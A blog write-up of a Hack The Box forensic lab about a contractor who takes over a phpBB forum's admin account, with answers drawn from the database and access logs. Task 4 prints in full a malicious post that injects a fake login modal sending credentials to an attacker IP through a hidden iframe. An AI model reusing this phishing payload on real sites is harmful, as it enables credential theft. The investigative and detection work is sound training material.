はまやんはまやんはまやん

hamayanhamayan's blog

Hack The Box Sherlocks - Bumblebee Writeup

https://app.hackthebox.com/sherlocks/Bumblebee
What are Hack The Box Sherlocks?

Sherlock Scenario

An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.

We are given the web server logs and a database dump.

Tasks

Task 1

What was the username of the external contractor?

Let's look at the database dump.
Run $ sqlitebrowser phpbb.sqlite3 and browse through the tables. The phpbb_users table looks like it holds the user information; answering with the last username listed there was correct. apoole1

Task 2

What IP address did the contractor use to create their account?

The same table as in Task 1 also lists the IP address. 10.10.0.78

Task 3

What is the post_id of the malicious post that the contractor made?

The same table as in Task 1 shows that this user has user_id 52.
Looking at phpbb_posts, which should hold the posts,
there is a post with poster_id=52.
Its post_id was 9.
9

Task 4

What is the full URI that the credential stealer sends its data to?

Likewise, phpbb_posts also stores the post content, which is the following.

<div><style>body {    z-index: 100;}.modal {    position:fixed;    top:0;    left:0;    height:100%;    width:100%;    z-index:101;    background-color:white;    opacity:1;}.modal.hidden {    visibility: hidden;}</style><script type="text/javascript">function sethidden(){    const d = new Date();    d.setTime(d.getTime() + (24*60*60*1000));    let expires = "expires="+ d.toUTCString();    document.cookie = "phpbb_token=1;" + expires + ";";    var modal = document.getElementById('zbzbz1234');    modal.classList.add("hidden");}document.addEventListener("DOMContentLoaded", function(event) {    let cookieexists = false;    let name = "phpbb_token=";    let cookies = decodeURIComponent(document.cookie);    let ca = cookies.split(';');    for(let i = 0; i < ca.length; i++)    {        let c = ca[i];        while(c.charAt(0) == ' ')        {            c = c.substring(1);        }        if(c.indexOf(name) == 0) {            cookieexists = true;        }    }    if(cookieexists){        return;    }    var modal = document.getElementById('zbzbz1234');    modal.classList.remove("hidden");});</script><iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>    <div class="modal hidden" id="zbzbz1234" onload="shouldshow">    <div id="wrap" class="wrap">        <a id="top" class="top-anchor" accesskey="t"></a>        <div id="page-header">            <div class="headerbar" role="banner">                <div class="inner">                    <div id="site-description" class="site-description">                    <a id="logo" class="logo" href="./index.php" title="Board index"><span class="site_logo"></span></a>                    <h1>forum.forela.co.uk</h1>                    <p>Forela internal forum</p>                    <p class="skiplink"><a href="#start_here">Skip to content</a></p>                </div>                    <div id="search-box" class="search-box search-header" role="search">                    <form action="./search.php" method="get" 
id="search1">                    <fieldset>                        <input name="keywords" id="keywords1" type="search" maxlength="128" title="Search for keywords" class="inputbox search tiny" size="20" value="" placeholder="Search…">                        <button class="button button-search" type="submit" title="Search">                            <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                        </button>                        <a href="./search.php" class="button button-search-end" title="Advanced search">                            <i class="icon fa-cog fa-fw" aria-hidden="true"></i><span class="sr-only">Advanced search</span>                        </a>                    </fieldset>                    </form>                </div>                    </div>            </div>    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-main" class="nav-main linklist" role="menubar">                <li id="quick-links" class="quick-links dropdown-container responsive-menu" data-skip-responsive="true">                <a href="#" class="dropdown-trigger dropdown-toggle">                    <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick links</span>                </a>                <div class="dropdown">                    <div class="pointer"><div class="pointer-inner"></div></div>                    <ul class="dropdown-contents" role="menu">                                <li class="separator"></li>                                <li>                                    <a href="./search.php?search_id=unanswered" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-gray" aria-hidden="true"></i><span>Unanswered topics</span>                                    </a>                                </li>                                <li>                                    <a 
href="./search.php?search_id=active_topics" role="menuitem">                                        <i class="icon fa-file-o fa-fw icon-blue" aria-hidden="true"></i><span>Active topics</span>                                    </a>                                </li>                                <li class="separator"></li>                                <li>                                    <a href="./search.php" role="menuitem">                                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span>Search</span>                                    </a>                                </li>                            <li class="separator"></li>                        </ul>                </div>            </li>                <li data-skip-responsive="true">                <a href="/phpBB3/app.php/help/faq" rel="help" title="Frequently Asked Questions" role="menuitem">                    <i class="icon fa-question-circle fa-fw" aria-hidden="true"></i><span>FAQ</span>                </a>                            <li class="rightside" data-skip-responsive="true">                <a href="./ucp.php?mode=login" title="Login" accesskey="x" role="menuitem">                    <i class="icon fa-power-off fa-fw" aria-hidden="true"></i><span>Login</span>                </a>            </li>                <li class="rightside" data-skip-responsive="true">                    <a href="./ucp.php?mode=register" role="menuitem">                        <i class="icon fa-pencil-square-o  fa-fw" aria-hidden="true"></i><span>Register</span>                    </a>                </li>        </li data-skip-responsive="true"></ul>            <ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks" role="menubar">            <li class="breadcrumbs" itemscope="" itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">                    <span class="crumb" itemtype="http://schema.org/ListItem" itemprop="itemListElement" 
itemscope=""><a href="./index.php" itemtype="https://schema.org/Thing" itemprop="item" accesskey="h" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw"></i><span itemprop="name">Board index</span></a><meta itemprop="position" content="1"></span>                </li>                    <li class="rightside responsive-search">                    <a href="./search.php" title="View the advanced search options" role="menuitem">                        <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span>                    </a>                </li>        </ul>            </div>    </div>        </div>                <a id="start_here" class="anchor"></a>        <div id="page-body" class="page-body" role="main">                <div class="panel">                <div class="inner">                        <div class="content">                    <h3>Session Timeout</h3>            <br/>         <br/>                    <p>Your session token has timed out in order to proceed you must login again.</p>                </div>                        </div>            </div>    <form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe">    <div class="panel">        <div class="inner">            <div class="content">            <h2 class="login-title">Login</h2>                <fieldset class="fields1">            <dl>                <dt><label for="username">Username:</label></dt>                <dd><input type="text" tabindex="1" name="username" id="username" size="25" value="" class="inputbox autowidth"></dd>            </dl>            <dl>                <dt><label for="password">Password:</label></dt>                <dd><input type="password" tabindex="2" id="password" name="password" size="25" class="inputbox autowidth" autocomplete="off"></dd>            </dl>            <dl>    <dd><label for="autologin"><input type="checkbox" name="autologin" 
id="autologin" tabindex="4">Remember me</label></dd>            <dd><label for="viewonline"><input type="checkbox" name="viewonline" id="viewonline" tabindex="5">Hide my online status this session</label></dd>            </dl>                <dl>                <dt>&nbsp;</dt>                <dd>    <input type="submit" name="login" tabindex="6" value="Login" class="button1" onclick="sethidden()"></dd>            </dl>                    </fieldset class="fields1"></div>            </div>    </div>        </form>            </div>            <div id="page-footer" class="page-footer" role="contentinfo">    <div class="navbar" role="navigation">        <div class="inner">            <ul id="nav-footer" class="nav-footer linklist" role="menubar">            <li class="breadcrumbs">    <span class="crumb"><a href="./index.php" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw" aria-hidden="true"></i><span>Board index</span></a></span>       </li>                <li class="responsive-menu hidden rightside dropdown-container"><a href="javascript:void(0);" class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i class="icon fa-bars fa-fw" aria-hidden="true"></i></a><div class="dropdown"><div class="pointer"><div class="pointer-inner"></div></div><ul class="dropdown-contents"></ul></div></li><li class="rightside">All times are <span title="UTC">UTC</span></li>                <li class="rightside">                    <a href="./ucp.php?mode=delete_cookies" data-ajax="true" data-refresh="true" role="menuitem">                        <i class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete cookies</span>                    </a>                </li>        </ul>            </div>    </div>            <div class="copyright">            <p class="footer-row">                <span class="footer-copyright">Powered by <a href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB Limited</span>            </p>            <p 
class="footer-row">                <a class="footer-link" href="./ucp.php?mode=privacy" title="Privacy" role="menuitem">                    <span class="footer-link-text">Privacy</span>                </a>                |                <a class="footer-link" href="./ucp.php?mode=terms" title="Terms" role="menuitem">                    <span class="footer-link-text">Terms</span>                </a>            </p>        </div>            <div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error" data-ajax-error-text="Something went wrong when processing your request." data-ajax-error-text-abort="User aborted request." data-ajax-error-text-timeout="Your request timed out; please try again." data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">            <div id="darken" class="darken">&nbsp;</div>        </div>            <div id="phpbb_alert" class="phpbb_alert" data-l-err="Error" data-l-timeout-processing-req="Request timed out.">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <h3 class="alert_title">&nbsp;</h3><p class="alert_text"></p>        </div>        <div id="phpbb_confirm" class="phpbb_alert">            <a href="#" class="alert_close">                <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i>            </a>            <div class="alert_text"></div>        </div>    </div>        </div>        <div>        <a id="bottom" class="anchor" accesskey="z"></a>    <img src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron"></div></div><span>Greetings everyone,<br>   <br>  I am just a visiting IT Contractor, it's a fantastic company y'all have here.<br> I hope to work with you all again soon.<br>   <br>  Regards,<br>Alex Poole</span></div>

A fake login form has been set up inside the post (it submits into a hidden iframe, so the victim sees nothing). Its action URL is the answer. http://10.10.0.78/update.php
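A detection check for this kind of post, written as an added example and not part of the original writeup: it flags post HTML containing a form whose action points at a host other than the forum, a password field, and a hidden iframe. The forum hostname and the shortened sample post are assumptions modelled on the post quoted above.

```python
# Added example (not from the original writeup): flag forum posts whose HTML
# contains a <form> submitting to a host other than the forum itself, which is
# how the stealer in Task 4 exfiltrates credentials. The forum hostname and the
# sample post are assumptions modelled on the post quoted on the page.
import re
from urllib.parse import urlparse

FORUM_HOST = "forum.forela.co.uk"  # assumed forum hostname (from the post's <h1>)

# Constructed sample post body, shortened from the post shown on the page.
SAMPLE_POST = (
    '<div><iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>'
    '<div class="modal hidden" id="zbzbz1234">'
    '<form action="./search.php" method="get" id="search1"></form>'
    '<form action="http://10.10.0.78/update.php" method="post" id="login" '
    'target="hiddenframe"><input type="password" name="password"></form>'
    '</div><span>Greetings everyone, Alex Poole</span></div>'
)

FORM_RE = re.compile(r"<form\b[^>]*\baction=[\"']([^\"']+)[\"']", re.I)
PASSWORD_RE = re.compile(r"<input\b[^>]*\btype=[\"']password[\"']", re.I)
HIDDEN_IFRAME_RE = re.compile(r"<iframe\b[^>]*display:\s*none", re.I)

def find_external_forms(html, forum_host=FORUM_HOST):
    """Return the action URLs of forms that submit to a host other than the forum."""
    findings = []
    for action in FORM_RE.findall(html):
        host = urlparse(action).hostname
        # Relative actions (./search.php) stay on the forum; an absolute URL to
        # another host is the exfiltration channel we want to flag.
        if host and host != forum_host:
            findings.append(action)
    return findings

def classify_post(html, forum_host=FORUM_HOST):
    """List the stealer indicators present: external form, password field, hidden iframe."""
    reasons = []
    if find_external_forms(html, forum_host):
        reasons.append("external_form")
    if PASSWORD_RE.search(html):
        reasons.append("password_field")
    if HIDDEN_IFRAME_RE.search(html):
        reasons.append("hidden_iframe")
    return reasons

if __name__ == "__main__":
    print(find_external_forms(SAMPLE_POST))
    print(classify_post(SAMPLE_POST))
```

Running the same check over every row of phpbb_posts would surface post_id 9 without reading each post by hand.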

Task 5

When did the contractor log into the forum as the administrator? (UTC)

Looking at phpbb_log, there is a record like
10.10.0.78 1682506392 LOG_ADMIN_AUTH_SUCCESS
The 1682506392 is a Unix timestamp; converting it to UTC gives the answer. 26/04/2023 10:53:12

Task 6

In the forum there are plaintext credentials for the LDAP connection, what is the password?

It was stored in phpbb_config in the DB.
Passw0rd1

Task 7

What is the user agent of the Administrator user?

I ran $ cat access.log | grep 'admin' and answered with the UA of the first log line that came up.
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

Task 8

What time did the contractor add themselves to the Administrator group? (UTC)

Looking at phpbb_log, there is a record like
10.10.0.78 1682506431 LOG_USERS_ADDED a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}
The time 1682506431 looks like a Unix timestamp, so converting it to UTC gives the answer. 26/04/2023 10:53:51

Task 9

What time did the contractor download the database backup? (UTC)

$ cat access.log | grep 'backup'
10.10.0.78 - - [26/Apr/2023:11:56:28 +0100] "GET /adm/index.php?i=acp_database&sid=eca30c1b75dc3eed1720423aa1ff9577&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?i=acp_database&sid=eca30c1b75dc3eed1720423aa1ff9577&mode=backup&action=download" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
...
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
...

There is a suspicious download record here (the .sql.gz file under /store/), so answer with its time. The log timestamp carries a +0100 offset, so subtract one hour to get UTC.
26/04/2023 11:01:38

Task 10

What was the size in bytes of the database backup as stated by access.log?

The same entry as in Task 9 also states the file size.

10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

34707
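Tasks 5, 8, 9 and 10 all come down to normalising timestamps from two sources (Unix epochs in phpbb_log, local time with a +0100 offset in access.log) into UTC. As an added example, not part of the original writeup, the following merges both into one UTC timeline; the rows and log lines are constructed from the values quoted above and shortened.

```python
# Added example (not from the original writeup): normalise both evidence sources
# used in Tasks 5, 8, 9 and 10 into one UTC timeline. phpbb_log stores Unix
# timestamps, while access.log stamps lines in local time with a +0100 offset.
# The rows and lines below are constructed from the values quoted on the page.
import re
from datetime import datetime, timezone

# Constructed phpbb_log rows (log_ip, log_time, log_operation) as quoted on the page.
PHPBB_LOG = [
    ("10.10.0.78", 1682506392, "LOG_ADMIN_AUTH_SUCCESS"),
    ("10.10.0.78", 1682506431, "LOG_USERS_ADDED"),
]

# Constructed access.log lines (Apache combined format), shortened from the page.
ACCESS_LOG = """\
10.10.0.78 - - [26/Apr/2023:11:56:28 +0100] "GET /adm/index.php?i=acp_database&mode=backup HTTP/1.1" 200 3770 "-" "Mozilla/5.0"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
FMT = "%d/%m/%Y %H:%M:%S"  # the answer format the Sherlock asks for

def epoch_to_utc(ts):
    """Render a phpbb_log Unix timestamp as a UTC answer string."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime(FMT)

def parse_access_line(line):
    """Parse one combined-log line; %z makes the datetime offset-aware so it converts cleanly."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    size = 0 if m["bytes"] == "-" else int(m["bytes"])
    return {"ip": m["ip"], "utc": when, "request": m["req"], "bytes": size}

def build_timeline():
    """Merge both sources and sort by UTC; each entry is (utc_str, source, detail)."""
    events = [(datetime.fromtimestamp(t, tz=timezone.utc), "phpbb_log", op) for _, t, op in PHPBB_LOG]
    for line in ACCESS_LOG.splitlines():
        rec = parse_access_line(line)
        if rec:
            events.append((rec["utc"], "access.log", f'{rec["request"]} ({rec["bytes"]} bytes)'))
    events.sort(key=lambda e: e[0])
    return [(t.strftime(FMT), src, detail) for t, src, detail in events]
```

build_timeline() returns the admin login, the group change, the backup request and the 34707-byte download in order, which is the sequence the Sherlock walks through.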